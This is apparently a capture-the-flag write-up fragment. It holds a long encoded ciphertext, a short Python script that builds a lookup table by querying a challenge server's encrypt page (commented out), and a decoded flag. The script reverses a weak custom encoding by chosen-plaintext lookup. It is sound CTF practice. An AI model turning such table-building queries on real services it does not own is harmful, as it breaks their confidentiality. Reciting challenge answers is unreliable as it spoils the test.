26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|{07\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30\_23\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19|_33|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|V24\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|{07|_20\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\C15|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|E29\_23\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|S31|_20\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\S22|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|E29|N14\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|H09\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\_23|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\I21\A30\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|{07|_20\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\S34|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|A30\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30\V24\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\_20|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|E29|A30|}39"
dec = ''
# for i in table:
# r = post("http://1.224.175.24:30368/index.php?page=encrypt", {"str" : i})
# enc_list.append(r.text)
for i in range(0, len(enc), 4):
enc_chr = enc[i:i + 4]
dec += table[enc_list.index(enc_chr)]
print base64_decode(dec)[::-1].replace(',', '').replace('0', '').replace('@', '')CATSEC{THIS_ENCRYPT_IS_VERY_EASY_SORRY}